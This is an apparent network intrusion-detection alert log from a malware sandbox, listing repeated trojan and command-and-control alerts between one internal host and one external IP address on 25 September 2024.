                2024-09-25T15:29:37.932328+020020254831A Network Trojan was detected188.114.96.380192.168.2.455941TCP
                2024-09-25T15:29:38.895251+020020254831A Network Trojan was detected188.114.96.380192.168.2.455942TCP
                2024-09-25T15:29:39.772496+020020254831A Network Trojan was detected188.114.96.380192.168.2.455943TCP
                2024-09-25T15:29:40.659576+020020254831A Network Trojan was detected188.114.96.380192.168.2.455944TCP
                2024-09-25T15:29:41.476685+020020254831A Network Trojan was detected188.114.96.380192.168.2.455945TCP
                2024-09-25T15:29:42.310743+020020254831A Network Trojan was detected188.114.96.380192.168.2.455946TCP
                2024-09-25T15:29:43.167479+020020254831A Network Trojan was detected188.114.96.380192.168.2.455947TCP
                2024-09-25T15:29:44.101969+020020254831A Network Trojan was detected188.114.96.380192.168.2.455948TCP
                2024-09-25T15:29:45.061185+020020254831A Network Trojan was detected188.114.96.380192.168.2.455949TCP
                2024-09-25T15:29:46.152919+020020254831A Network Trojan was detected188.114.96.380192.168.2.455950TCP
                2024-09-25T15:29:47.191361+020020254831A Network Trojan was detected188.114.96.380192.168.2.455951TCP
                2024-09-25T15:29:48.244918+020020254831A Network Trojan was detected188.114.96.380192.168.2.455952TCP
                2024-09-25T15:29:49.520363+020020254831A Network Trojan was detected188.114.96.380192.168.2.455953TCP
                2024-09-25T15:29:50.349453+020020254831A Network Trojan was detected188.114.96.380192.168.2.455954TCP
                2024-09-25T15:29:51.280707+020020254831A Network Trojan was detected188.114.96.380192.168.2.455955TCP
                2024-09-25T15:29:52.202676+020020254831A Network Trojan was detected188.114.96.380192.168.2.455956TCP
                2024-09-25T15:29:53.234693+020020254831A Network Trojan was detected188.114.96.380192.168.2.455957TCP
                2024-09-25T15:29:54.106348+020020254831A Network Trojan was detected188.114.96.380192.168.2.455958TCP
                2024-09-25T15:29:54.976956+020020254831A Network Trojan was detected188.114.96.380192.168.2.455959TCP
                2024-09-25T15:29:56.069027+020020254831A Network Trojan was detected188.114.96.380192.168.2.455960TCP
                2024-09-25T15:29:56.906316+020020254831A Network Trojan was detected188.114.96.380192.168.2.455961TCP
                2024-09-25T15:29:57.741467+020020254831A Network Trojan was detected188.114.96.380192.168.2.455962TCP
                2024-09-25T15:29:58.847290+020020254831A Network Trojan was detected188.114.96.380192.168.2.455963TCP
                2024-09-25T15:29:59.674829+020020254831A Network Trojan was detected188.114.96.380192.168.2.455964TCP
                2024-09-25T15:30:00.564280+020020254831A Network Trojan was detected188.114.96.380192.168.2.455965TCP
                2024-09-25T15:30:01.632246+020020254831A Network Trojan was detected188.114.96.380192.168.2.455966TCP
                2024-09-25T15:30:02.601054+020020254831A Network Trojan was detected188.114.96.380192.168.2.455967TCP
                2024-09-25T15:30:03.528472+020020254831A Network Trojan was detected188.114.96.380192.168.2.455968TCP
                2024-09-25T15:30:05.073629+020020254831A Network Trojan was detected188.114.96.380192.168.2.455969TCP
                2024-09-25T15:30:06.059293+020020254831A Network Trojan was detected188.114.96.380192.168.2.455970TCP
                2024-09-25T15:30:07.466088+020020254831A Network Trojan was detected188.114.96.380192.168.2.455971TCP
                2024-09-25T15:30:08.379045+020020254831A Network Trojan was detected188.114.96.380192.168.2.455972TCP
                2024-09-25T15:30:09.189852+020020254831A Network Trojan was detected188.114.96.380192.168.2.455973TCP
                2024-09-25T15:30:10.056504+020020254831A Network Trojan was detected188.114.96.380192.168.2.455974TCP
                2024-09-25T15:30:10.866580+020020254831A Network Trojan was detected188.114.96.380192.168.2.455975TCP
                2024-09-25T15:30:12.057825+020020254831A Network Trojan was detected188.114.96.380192.168.2.455976TCP
                2024-09-25T15:30:12.928806+020020254831A Network Trojan was detected188.114.96.380192.168.2.455977TCP
                2024-09-25T15:30:13.843863+020020254831A Network Trojan was detected188.114.96.380192.168.2.455978TCP
                2024-09-25T15:30:14.670223+020020254831A Network Trojan was detected188.114.96.380192.168.2.455979TCP
                2024-09-25T15:30:15.531017+020020254831A Network Trojan was detected188.114.96.380192.168.2.455980TCP
                2024-09-25T15:30:16.357320+020020254831A Network Trojan was detected188.114.96.380192.168.2.455981TCP
                2024-09-25T15:30:17.335069+020020254831A Network Trojan was detected188.114.96.380192.168.2.455982TCP
                2024-09-25T15:30:18.196346+020020254831A Network Trojan was detected188.114.96.380192.168.2.455983TCP
                2024-09-25T15:30:19.044870+020020254831A Network Trojan was detected188.114.96.380192.168.2.455984TCP
                2024-09-25T15:30:19.932506+020020254831A Network Trojan was detected188.114.96.380192.168.2.455985TCP
                2024-09-25T15:30:21.361415+020020254831A Network Trojan was detected188.114.96.380192.168.2.455986TCP
                2024-09-25T15:30:22.977810+020020254831A Network Trojan was detected188.114.96.380192.168.2.455987TCP
                2024-09-25T15:30:24.173330+020020254831A Network Trojan was detected188.114.96.380192.168.2.455988TCP
                2024-09-25T15:30:25.139379+020020254831A Network Trojan was detected188.114.96.380192.168.2.455989TCP
                2024-09-25T15:30:26.014599+020020254831A Network Trojan was detected188.114.96.380192.168.2.455990TCP
                2024-09-25T15:30:26.836287+020020254831A Network Trojan was detected188.114.96.380192.168.2.455991TCP
                2024-09-25T15:30:27.742915+020020254831A Network Trojan was detected188.114.96.380192.168.2.455992TCP
                2024-09-25T15:30:28.613288+020020254831A Network Trojan was detected188.114.96.380192.168.2.455993TCP
                2024-09-25T15:30:29.447188+020020254831A Network Trojan was detected188.114.96.380192.168.2.455994TCP
                2024-09-25T15:30:30.276618+020020254831A Network Trojan was detected188.114.96.380192.168.2.455995TCP
                2024-09-25T15:30:31.126338+020020254831A Network Trojan was detected188.114.96.380192.168.2.455996TCP
                2024-09-25T15:30:31.987764+020020254831A Network Trojan was detected188.114.96.380192.168.2.455997TCP
                2024-09-25T15:30:32.896266+020020254831A Network Trojan was detected188.114.96.380192.168.2.455998TCP
                2024-09-25T15:30:33.921906+020020254831A Network Trojan was detected188.114.96.380192.168.2.455999TCP
                2024-09-25T15:30:35.638685+020020254831A Network Trojan was detected188.114.96.380192.168.2.456000TCP
                2024-09-25T15:30:36.517408+020020254831A Network Trojan was detected188.114.96.380192.168.2.456001TCP
                2024-09-25T15:30:38.539438+020020254831A Network Trojan was detected188.114.96.380192.168.2.456002TCP
                2024-09-25T15:30:39.450411+020020254831A Network Trojan was detected188.114.96.380192.168.2.456003TCP
                2024-09-25T15:30:40.288333+020020254831A Network Trojan was detected188.114.96.380192.168.2.456004TCP
                2024-09-25T15:30:41.175888+020020254831A Network Trojan was detected188.114.96.380192.168.2.456005TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T15:28:39.241108+020020243131Malware Command and Control Activity Detected192.168.2.449732188.114.96.380TCP
                2024-09-25T15:28:40.175614+020020243131Malware Command and Control Activity Detected192.168.2.449733188.114.96.380TCP
                2024-09-25T15:28:41.113236+020020243131Malware Command and Control Activity Detected192.168.2.449734188.114.96.380TCP
                2024-09-25T15:28:41.990383+020020243131Malware Command and Control Activity Detected192.168.2.449735188.114.96.380TCP
                2024-09-25T15:28:42.845238+020020243131Malware Command and Control Activity Detected192.168.2.449736188.114.96.380TCP
                2024-09-25T15:28:43.869838+020020243131Malware Command and Control Activity Detected192.168.2.449737188.114.96.380TCP
                2024-09-25T15:28:44.707278+020020243131Malware Command and Control Activity Detected192.168.2.449738188.114.96.380TCP
                2024-09-25T15:28:45.626258+020020243131Malware Command and Control Activity Detected192.168.2.449739188.114.96.380TCP
                2024-09-25T15:28:46.435201+020020243131Malware Command and Control Activity Detected192.168.2.449740188.114.96.380TCP
                2024-09-25T15:28:47.272281+020020243131Malware Command and Control Activity Detected192.168.2.449741188.114.96.380TCP
                2024-09-25T15:28:48.160931+020020243131Malware Command and Control Activity Detected192.168.2.449743188.114.96.380TCP
                2024-09-25T15:28:49.039252+020020243131Malware Command and Control Activity Detected192.168.2.449745188.114.96.380TCP
                2024-09-25T15:28:49.978517+020020243131Malware Command and Control Activity Detected192.168.2.449747188.114.96.380TCP
                2024-09-25T15:28:50.952046+020020243131Malware Command and Control Activity Detected192.168.2.449749188.114.96.380TCP
                2024-09-25T15:28:51.830924+020020243131Malware Command and Control Activity Detected192.168.2.455890188.114.96.380TCP
                2024-09-25T15:28:52.731636+020020243131Malware Command and Control Activity Detected192.168.2.455892188.114.96.380TCP
                2024-09-25T15:28:53.550696+020020243131Malware Command and Control Activity Detected192.168.2.455893188.114.96.380TCP
                2024-09-25T15:28:54.379847+020020243131Malware Command and Control Activity Detected192.168.2.455894188.114.96.380TCP
                2024-09-25T15:28:55.230197+020020243131Malware Command and Control Activity Detected192.168.2.455895188.114.96.380TCP
                2024-09-25T15:28:56.263321+020020243131Malware Command and Control Activity Detected192.168.2.455896188.114.96.380TCP
                2024-09-25T15:28:57.191920+020020243131Malware Command and Control Activity Detected192.168.2.455897188.114.96.380TCP
                2024-09-25T15:28:58.321400+020020243131Malware Command and Control Activity Detected192.168.2.455898188.114.96.380TCP
                2024-09-25T15:28:59.169488+020020243131Malware Command and Control Activity Detected192.168.2.455899188.114.96.380TCP
                2024-09-25T15:29:00.300722+020020243131Malware Command and Control Activity Detected192.168.2.455900188.114.96.380TCP
                2024-09-25T15:29:01.202417+020020243131Malware Command and Control Activity Detected192.168.2.455901188.114.96.380TCP
                2024-09-25T15:29:02.085525+020020243131Malware Command and Control Activity Detected192.168.2.455902188.114.96.380TCP
                2024-09-25T15:29:03.023456+020020243131Malware Command and Control Activity Detected192.168.2.455903188.114.96.380TCP
                2024-09-25T15:29:03.936890+020020243131Malware Command and Control Activity Detected192.168.2.455904188.114.96.380TCP
                2024-09-25T15:29:04.757534+020020243131Malware Command and Control Activity Detected192.168.2.455905188.114.96.380TCP
                2024-09-25T15:29:05.574850+020020243131Malware Command and Control Activity Detected192.168.2.455906188.114.96.380TCP
                2024-09-25T15:29:06.426526+020020243131Malware Command and Control Activity Detected192.168.2.455907188.114.96.380TCP
                2024-09-25T15:29:07.270520+020020243131Malware Command and Control Activity Detected192.168.2.455908188.114.96.380TCP
                2024-09-25T15:29:08.155785+020020243131Malware Command and Control Activity Detected192.168.2.455909188.114.96.380TCP
                2024-09-25T15:29:09.003544+020020243131Malware Command and Control Activity Detected192.168.2.455910188.114.96.380TCP
                2024-09-25T15:29:09.872961+020020243131Malware Command and Control Activity Detected192.168.2.455911188.114.96.380TCP
                2024-09-25T15:29:10.728142+020020243131Malware Command and Control Activity Detected192.168.2.455912188.114.96.380TCP
                2024-09-25T15:29:11.581836+020020243131Malware Command and Control Activity Detected192.168.2.455913188.114.96.380TCP
                2024-09-25T15:29:12.445970+020020243131Malware Command and Control Activity Detected192.168.2.455914188.114.96.380TCP
                2024-09-25T15:29:13.328556+020020243131Malware Command and Control Activity Detected192.168.2.455915188.114.96.380TCP
                2024-09-25T15:29:14.284533+020020243131Malware Command and Control Activity Detected192.168.2.455916188.114.96.380TCP
                2024-09-25T15:29:15.163543+020020243131Malware Command and Control Activity Detected192.168.2.455917188.114.96.380TCP
                2024-09-25T15:29:16.082398+020020243131Malware Command and Control Activity Detected192.168.2.455918188.114.96.380TCP
                2024-09-25T15:29:17.069655+020020243131Malware Command and Control Activity Detected192.168.2.455919188.114.96.380TCP
                2024-09-25T15:29:17.927204+020020243131Malware Command and Control Activity Detected192.168.2.455920188.114.96.380TCP
                2024-09-25T15:29:18.781204+020020243131Malware Command and Control Activity Detected192.168.2.455921188.114.96.380TCP
                2024-09-25T15:29:19.609687+020020243131Malware Command and Control Activity Detected192.168.2.455922188.114.96.380TCP
                2024-09-25T15:29:20.495550+020020243131Malware Command and Control Activity Detected192.168.2.455923188.114.96.380TCP
                2024-09-25T15:29:21.686655+020020243131Malware Command and Control Activity Detected192.168.2.455924188.114.96.380TCP
                2024-09-25T15:29:22.674104+020020243131Malware Command and Control Activity Detected192.168.2.455925188.114.96.380TCP
                2024-09-25T15:29:23.754090+020020243131Malware Command and Control Activity Detected192.168.2.455926188.114.96.380TCP
                2024-09-25T15:29:24.756018+020020243131Malware Command and Control Activity Detected192.168.2.455927188.114.96.380TCP
                2024-09-25T15:29:26.878403+020020243131Malware Command and Control Activity Detected192.168.2.455928188.114.96.380TCP
                2024-09-25T15:29:27.710722+020020243131Malware Command and Control Activity Detected192.168.2.455929188.114.96.380TCP
                2024-09-25T15:29:28.623111+020020243131Malware Command and Control Activity Detected192.168.2.455931188.114.96.380TCP
                2024-09-25T15:29:29.616024+020020243131Malware Command and Control Activity Detected192.168.2.455932188.114.96.380TCP
                2024-09-25T15:29:30.431091+020020243131Malware Command and Control Activity Detected192.168.2.455933188.114.96.380TCP
                2024-09-25T15:29:31.557337+020020243131Malware Command and Control Activity Detected192.168.2.455934188.114.96.380TCP
                2024-09-25T15:29:32.624051+020020243131Malware Command and Control Activity Detected192.168.2.455935188.114.96.380TCP
                2024-09-25T15:29:33.508697+020020243131Malware Command and Control Activity Detected192.168.2.455936188.114.96.380TCP
                2024-09-25T15:29:34.368849+020020243131Malware Command and Control Activity Detected192.168.2.455937188.114.96.380TCP
                2024-09-25T15:29:35.193903+020020243131Malware Command and Control Activity Detected192.168.2.455938188.114.96.380TCP
                2024-09-25T15:29:36.042891+020020243131Malware Command and Control Activity Detected192.168.2.455939188.114.96.380TCP
                2024-09-25T15:29:36.930414+020020243131Malware Command and Control Activity Detected192.168.2.455940188.114.96.380TCP
                2024-09-25T15:29:37.927518+020020243131Malware Command and Control Activity Detected192.168.2.455941188.114.96.380TCP
                2024-09-25T15:29:38.890390+020020243131Malware Command and Control Activity Detected192.168.2.455942188.114.96.380TCP
                2024-09-25T15:29:39.761200+020020243131Malware Command and Control Activity Detected192.168.2.455943188.114.96.380TCP
                2024-09-25T15:29:40.653978+020020243131Malware Command and Control Activity Detected192.168.2.455944188.114.96.380TCP
                2024-09-25T15:29:41.471815+020020243131Malware Command and Control Activity Detected192.168.2.455945188.114.96.380TCP
                2024-09-25T15:29:42.305950+020020243131Malware Command and Control Activity Detected192.168.2.455946188.114.96.380TCP
                2024-09-25T15:29:43.162638+020020243131Malware Command and Control Activity Detected192.168.2.455947188.114.96.380TCP
                2024-09-25T15:29:44.097010+020020243131Malware Command and Control Activity Detected192.168.2.455948188.114.96.380TCP
                2024-09-25T15:29:45.056343+020020243131Malware Command and Control Activity Detected192.168.2.455949188.114.96.380TCP
                2024-09-25T15:29:46.147975+020020243131Malware Command and Control Activity Detected192.168.2.455950188.114.96.380TCP
                2024-09-25T15:29:47.186447+020020243131Malware Command and Control Activity Detected192.168.2.455951188.114.96.380TCP
                2024-09-25T15:29:48.240064+020020243131Malware Command and Control Activity Detected192.168.2.455952188.114.96.380TCP
                2024-09-25T15:29:49.512910+020020243131Malware Command and Control Activity Detected192.168.2.455953188.114.96.380TCP
                2024-09-25T15:29:50.344616+020020243131Malware Command and Control Activity Detected192.168.2.455954188.114.96.380TCP
                2024-09-25T15:29:51.275783+020020243131Malware Command and Control Activity Detected192.168.2.455955188.114.96.380TCP
                2024-09-25T15:29:52.197836+020020243131Malware Command and Control Activity Detected192.168.2.455956188.114.96.380TCP
                2024-09-25T15:29:53.229813+020020243131Malware Command and Control Activity Detected192.168.2.455957188.114.96.380TCP
                2024-09-25T15:29:54.101488+020020243131Malware Command and Control Activity Detected192.168.2.455958188.114.96.380TCP
                2024-09-25T15:29:54.972069+020020243131Malware Command and Control Activity Detected192.168.2.455959188.114.96.380TCP
                2024-09-25T15:29:56.064141+020020243131Malware Command and Control Activity Detected192.168.2.455960188.114.96.380TCP
                2024-09-25T15:29:56.901470+020020243131Malware Command and Control Activity Detected192.168.2.455961188.114.96.380TCP
                2024-09-25T15:29:57.735297+020020243131Malware Command and Control Activity Detected192.168.2.455962188.114.96.380TCP
                2024-09-25T15:29:58.842437+020020243131Malware Command and Control Activity Detected192.168.2.455963188.114.96.380TCP
                2024-09-25T15:29:59.669969+020020243131Malware Command and Control Activity Detected192.168.2.455964188.114.96.380TCP
                2024-09-25T15:30:00.558633+020020243131Malware Command and Control Activity Detected192.168.2.455965188.114.96.380TCP
                2024-09-25T15:30:01.627418+020020243131Malware Command and Control Activity Detected192.168.2.455966188.114.96.380TCP
                2024-09-25T15:30:02.596189+020020243131Malware Command and Control Activity Detected192.168.2.455967188.114.96.380TCP
                2024-09-25T15:30:03.523662+020020243131Malware Command and Control Activity Detected192.168.2.455968188.114.96.380TCP
                2024-09-25T15:30:05.068828+020020243131Malware Command and Control Activity Detected192.168.2.455969188.114.96.380TCP
                2024-09-25T15:30:06.054434+020020243131Malware Command and Control Activity Detected192.168.2.455970188.114.96.380TCP
                2024-09-25T15:30:07.461247+020020243131Malware Command and Control Activity Detected192.168.2.455971188.114.96.380TCP
                2024-09-25T15:30:08.370283+020020243131Malware Command and Control Activity Detected192.168.2.455972188.114.96.380TCP
                2024-09-25T15:30:09.181372+020020243131Malware Command and Control Activity Detected192.168.2.455973188.114.96.380TCP
                2024-09-25T15:30:10.051609+020020243131Malware Command and Control Activity Detected192.168.2.455974188.114.96.380TCP
                2024-09-25T15:30:10.861804+020020243131Malware Command and Control Activity Detected192.168.2.455975188.114.96.380TCP
                2024-09-25T15:30:12.048794+020020243131Malware Command and Control Activity Detected192.168.2.455976188.114.96.380TCP
                2024-09-25T15:30:12.921894+020020243131Malware Command and Control Activity Detected192.168.2.455977188.114.96.380TCP
                2024-09-25T15:30:13.839050+020020243131Malware Command and Control Activity Detected192.168.2.455978188.114.96.380TCP
                2024-09-25T15:30:14.665373+020020243131Malware Command and Control Activity Detected192.168.2.455979188.114.96.380TCP
                2024-09-25T15:30:15.525637+020020243131Malware Command and Control Activity Detected192.168.2.455980188.114.96.380TCP
                2024-09-25T15:30:16.351549+020020243131Malware Command and Control Activity Detected192.168.2.455981188.114.96.380TCP
                2024-09-25T15:30:17.330144+020020243131Malware Command and Control Activity Detected192.168.2.455982188.114.96.380TCP
                2024-09-25T15:30:18.191485+020020243131Malware Command and Control Activity Detected192.168.2.455983188.114.96.380TCP
                2024-09-25T15:30:19.039902+020020243131Malware Command and Control Activity Detected192.168.2.455984188.114.96.380TCP
                2024-09-25T15:30:19.925798+020020243131Malware Command and Control Activity Detected192.168.2.455985188.114.96.380TCP
                2024-09-25T15:30:21.355002+020020243131Malware Command and Control Activity Detected192.168.2.455986188.114.96.380TCP
                2024-09-25T15:30:22.975845+020020243131Malware Command and Control Activity Detected192.168.2.455987188.114.96.380TCP
                2024-09-25T15:30:24.171451+020020243131Malware Command and Control Activity Detected192.168.2.455988188.114.96.380TCP
                2024-09-25T15:30:25.134380+020020243131Malware Command and Control Activity Detected192.168.2.455989188.114.96.380TCP
                2024-09-25T15:30:26.009752+020020243131Malware Command and Control Activity Detected192.168.2.455990188.114.96.380TCP
                2024-09-25T15:30:26.831403+020020243131Malware Command and Control Activity Detected192.168.2.455991188.114.96.380TCP
                2024-09-25T15:30:27.738071+020020243131Malware Command and Control Activity Detected192.168.2.455992188.114.96.380TCP
                2024-09-25T15:30:28.608409+020020243131Malware Command and Control Activity Detected192.168.2.455993188.114.96.380TCP
                2024-09-25T15:30:29.440258+020020243131Malware Command and Control Activity Detected192.168.2.455994188.114.96.380TCP
                2024-09-25T15:30:30.271298+020020243131Malware Command and Control Activity Detected192.168.2.455995188.114.96.380TCP
                2024-09-25T15:30:31.121473+020020243131Malware Command and Control Activity Detected192.168.2.455996188.114.96.380TCP
                2024-09-25T15:30:31.982949+020020243131Malware Command and Control Activity Detected192.168.2.455997188.114.96.380TCP
                2024-09-25T15:30:32.891448+020020243131Malware Command and Control Activity Detected192.168.2.455998188.114.96.380TCP
                2024-09-25T15:30:33.917047+020020243131Malware Command and Control Activity Detected192.168.2.455999188.114.96.380TCP
                2024-09-25T15:30:35.635959+020020243131Malware Command and Control Activity Detected192.168.2.456000188.114.96.380TCP
                2024-09-25T15:30:36.512575+020020243131Malware Command and Control Activity Detected192.168.2.456001188.114.96.380TCP
                2024-09-25T15:30:38.532750+020020243131Malware Command and Control Activity Detected192.168.2.456002188.114.96.380TCP
                2024-09-25T15:30:39.444328+020020243131Malware Command and Control Activity Detected192.168.2.456003188.114.96.380TCP
                2024-09-25T15:30:40.283415+020020243131Malware Command and Control Activity Detected192.168.2.456004188.114.96.380TCP
                2024-09-25T15:30:41.170973+020020243131Malware Command and Control Activity Detected192.168.2.456005188.114.96.380TCP
                2024-09-25T15:30:42.064291+020020243131Malware Command and Control Activity Detected192.168.2.456006188.114.96.380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T15:28:39.241108+020020243181Malware Command and Control Activity Detected192.168.2.449732188.114.96.380TCP
                2024-09-25T15:28:40.175614+020020243181Malware Command and Control Activity Detected192.168.2.449733188.114.96.380TCP
                2024-09-25T15:28:41.113236+020020243181Malware Command and Control Activity Detected192.168.2.449734188.114.96.380TCP
                2024-09-25T15:28:41.990383+020020243181Malware Command and Control Activity Detected192.168.2.449735188.114.96.380TCP
                2024-09-25T15:28:42.845238+020020243181Malware Command and Control Activity Detected192.168.2.449736188.114.96.380TCP
                2024-09-25T15:28:43.869838+020020243181Malware Command and Control Activity Detected192.168.2.449737188.114.96.380TCP
                2024-09-25T15:28:44.707278+020020243181Malware Command and Control Activity Detected192.168.2.449738188.114.96.380TCP
                2024-09-25T15:28:45.626258+020020243181Malware Command and Control Activity Detected192.168.2.449739188.114.96.380TCP
                2024-09-25T15:28:46.435201+020020243181Malware Command and Control Activity Detected192.168.2.449740188.114.96.380TCP
                2024-09-25T15:28:47.272281+020020243181Malware Command and Control Activity Detected192.168.2.449741188.114.96.380TCP
                2024-09-25T15:28:48.160931+020020243181Malware Command and Control Activity Detected192.168.2.449743188.114.96.380TCP
                2024-09-25T15:28:49.039252+020020243181Malware Command and Control Activity Detected192.168.2.449745188.114.96.380TCP
                2024-09-25T15:28:49.978517+020020243181Malware Command and Control Activity Detected192.168.2.449747188.114.96.380TCP
                2024-09-25T15:28:50.952046+020020243181Malware Command and Control Activity Detected192.168.2.449749188.114.96.380TCP
                2024-09-25T15:28:51.830924+020020243181Malware Command and Control Activity Detected192.168.2.455890188.114.96.380TCP
                2024-09-25T15:28:52.731636+020020243181Malware Command and Control Activity Detected192.168.2.455892188.114.96.380TCP
                2024-09-25T15:28:53.550696+020020243181Malware Command and Control Activity Detected192.168.2.455893188.114.96.380TCP
                2024-09-25T15:28:54.379847+020020243181Malware Command and Control Activity Detected192.168.2.455894188.114.96.380TCP
                2024-09-25T15:28:55.230197+020020243181Malware Command and Control Activity Detected192.168.2.455895188.114.96.380TCP
                2024-09-25T15:28:56.263321+020020243181Malware Command and Control Activity Detected192.168.2.455896188.114.96.380TCP
                2024-09-25T15:28:57.191920+020020243181Malware Command and Control Activity Detected192.168.2.455897188.114.96.380TCP
                2024-09-25T15:28:58.321400+020020243181Malware Command and Control Activity Detected192.168.2.455898188.114.96.380TCP
                2024-09-25T15:28:59.169488+020020243181Malware Command and Control Activity Detected192.168.2.455899188.114.96.380TCP
                2024-09-25T15:29:00.300722+020020243181Malware Command and Control Activity Detected192.168.2.455900188.114.96.380TCP
                2024-09-25T15:29:01.202417+020020243181Malware Command and Control Activity Detected192.168.2.455901188.114.96.380TCP
                2024-09-25T15:29:02.085525+020020243181Malware Command and Control Activity Detected192.168.2.455902188.114.96.380TCP
                2024-09-25T15:29:03.023456+020020243181Malware Command and Control Activity Detected192.168.2.455903188.114.96.380TCP
                2024-09-25T15:29:03.936890+020020243181Malware Command and Control Activity Detected192.168.2.455904188.114.96.380TCP
                2024-09-25T15:29:04.757534+020020243181Malware Command and Control Activity Detected192.168.2.455905188.114.96.380TCP
                2024-09-25T15:29:05.574850+020020243181Malware Command and Control Activity Detected192.168.2.455906188.114.96.380TCP
                2024-09-25T15:29:06.426526+020020243181Malware Command and Control Activity Detected192.168.2.455907188.114.96.380TCP
                2024-09-25T15:29:07.270520+020020243181Malware Command and Control Activity Detected192.168.2.455908188.114.96.380TCP
                2024-09-25T15:29:08.155785+020020243181Malware Command and Control Activity Detected192.168.2.455909188.114.96.380TCP
                2024-09-25T15:29:09.003544+020020243181Malware Command and Control Activity Detected192.168.2.455910188.114.96.380TCP
                2024-09-25T15:29:09.872961+020020243181Malware Command and Control Activity Detected192.168.2.455911188.114.96.380TCP
                2024-09-25T15:29:10.728142+020020243181Malware Command and Control Activity Detected192.168.2.455912188.114.96.380TCP
                2024-09-25T15:29:11.581836+020020243181Malware Command and Control Activity Detected192.168.2.455913188.114.96.380TCP
                2024-09-25T15:29:12.445970+020020243181Malware Command and Control Activity Detected192.168.2.455914188.114.96.380TCP
                2024-09-25T15:29:13.328556+020020243181Malware Command and Control Activity Detected192.168.2.455915188.114.96.380TCP
                2024-09-25T15:29:14.284533+020020243181Malware Command and Control Activity Detected192.168.2.455916188.114.96.380TCP
                2024-09-25T15:29:15.163543+020020243181Malware Command and Control Activity Detected192.168.2.455917188.114.96.380TCP
                2024-09-25T15:29:16.082398+020020243181Malware Command and Control Activity Detected192.168.2.455918188.114.96.380TCP
                2024-09-25T15:29:17.069655+020020243181Malware Command and Control Activity Detected192.168.2.455919188.114.96.380TCP
                2024-09-25T15:29:17.927204+020020243181Malware Command and Control Activity Detected192.168.2.455920188.114.96.380TCP
                2024-09-25T15:29:18.781204+020020243181Malware Command and Control Activity Detected192.168.2.455921188.114.96.380TCP
                2024-09-25T15:29:19.609687+020020243181Malware Command and Control Activity Detected192.168.2.455922188.114.96.380TCP
                2024-09-25T15:29:20.495550+020020243181Malware Command and Control Activity Detected192.168.2.455923188.114.96.380TCP
                2024-09-25T15:29:21.686655+020020243181Malware Command and Control Activity Detected192.168.2.455924188.114.96.380TCP
                2024-09-25T15:29:22.674104+020020243181Malware Command and Control Activity Detected192.168.2.455925188.114.96.380TCP
                2024-09-25T15:29:23.754090+020020243181Malware Command and Control Activity Detected192.168.2.455926188.114.96.380TCP
                2024-09-25T15:29:24.756018+020020243181Malware Command and Control Activity Detected192.168.2.455927188.114.96.380TCP
                2024-09-25T15:29:26.878403+020020243181Malware Command and Control Activity Detected192.168.2.455928188.114.96.380TCP
                2024-09-25T15:29:27.710722+020020243181Malware Command and Control Activity Detected192.168.2.455929188.114.96.380TCP
                2024-09-25T15:29:28.623111+020020243181Malware Command and Control Activity Detected192.168.2.455931188.114.96.380TCP
                2024-09-25T15:29:29.616024+020020243181Malware Command and Control Activity Detected192.168.2.455932188.114.96.380TCP
                2024-09-25T15:29:30.431091+020020243181Malware Command and Control Activity Detected192.168.2.455933188.114.96.380TCP
                2024-09-25T15:29:31.557337+020020243181Malware Command and Control Activity Detected192.168.2.455934188.114.96.380TCP
                2024-09-25T15:29:32.624051+020020243181Malware Command and Control Activity Detected192.168.2.455935188.114.96.380TCP
                2024-09-25T15:29:33.508697+020020243181Malware Command and Control Activity Detected192.168.2.455936188.114.96.380TCP
                2024-09-25T15:29:34.368849+020020243181Malware Command and Control Activity Detected192.168.2.455937188.114.96.380TCP
                2024-09-25T15:29:35.193903+020020243181Malware Command and Control Activity Detected192.168.2.455938188.114.96.380TCP
                2024-09-25T15:29:36.042891+020020243181Malware Command and Control Activity Detected192.168.2.455939188.114.96.380TCP
                2024-09-25T15:29:36.930414+020020243181Malware Command and Control Activity Detected192.168.2.455940188.114.96.380TCP
                2024-09-25T15:29:37.927518+020020243181Malware Command and Control Activity Detected192.168.2.455941188.114.96.380TCP
                2024-09-25T15:29:38.890390+020020243181Malware Command and Control Activity Detected192.168.2.455942188.114.96.380TCP
                2024-09-25T15:29:39.761200+020020243181Malware Command and Control Activity Detected192.168.2.455943188.114.96.380TCP
                2024-09-25T15:29:40.653978+020020243181Malware Command and Control Activity Detected192.168.2.455944188.114.96.380TCP
                2024-09-25T15:29:41.471815+020020243181Malware Command and Control Activity Detected192.168.2.455945188.114.96.380TCP
                2024-09-25T15:29:42.305950+020020243181Malware Command and Control Activity Detected192.168.2.455946188.114.96.380TCP
                2024-09-25T15:29:43.162638+020020243181Malware Command and Control Activity Detected192.168.2.455947188.114.96.380TCP
                2024-09-25T15:29:44.097010+020020243181Malware Command and Control Activity Detected192.168.2.455948188.114.96.380TCP
                2024-09-25T15:29:45.056343+020020243181Malware Command and Control Activity Detected192.168.2.455949188.114.96.380TCP
                2024-09-25T15:29:46.147975+020020243181Malware Command and Control Activity Detected192.168.2.455950188.114.96.380TCP
                2024-09-25T15:29:47.186447+020020243181Malware Command and Control Activity Detected192.168.2.455951188.114.96.380TCP
                2024-09-25T15:29:48.240064+020020243181Malware Command and Control Activity Detected192.168.2.455952188.114.96.380TCP
                2024-09-25T15:29:49.512910+020020243181Malware Command and Control Activity Detected192.168.2.455953188.114.96.380TCP
                2024-09-25T15:29:50.344616+020020243181Malware Command and Control Activity Detected192.168.2.455954188.114.96.380TCP
                2024-09-25T15:29:51.275783+020020243181Malware Command and Control Activity Detected192.168.2.455955188.114.96.380TCP
                2024-09-25T15:29:52.197836+020020243181Malware Command and Control Activity Detected192.168.2.455956188.114.96.380TCP
                2024-09-25T15:29:53.229813+020020243181Malware Command and Control Activity Detected192.168.2.455957188.114.96.380TCP
                2024-09-25T15:29:54.101488+020020243181Malware Command and Control Activity Detected192.168.2.455958188.114.96.380TCP
                2024-09-25T15:29:54.972069+020020243181Malware Command and Control Activity Detected192.168.2.455959188.114.96.380TCP
                2024-09-25T15:29:56.064141+020020243181Malware Command and Control Activity Detected192.168.2.455960188.114.96.380TCP
                2024-09-25T15:29:56.901470+020020243181Malware Command and Control Activity Detected192.168.2.455961188.114.96.380TCP
                2024-09-25T15:29:57.735297+020020243181Malware Command and Control Activity Detected192.168.2.455962188.114.96.380TCP
                2024-09-25T15:29:58.842437+020020243181Malware Command and Control Activity Detected192.168.2.455963188.114.96.380TCP
                2024-09-25T15:29:59.669969+020020243181Malware Command and Control Activity Detected192.168.2.455964188.114.96.380TCP
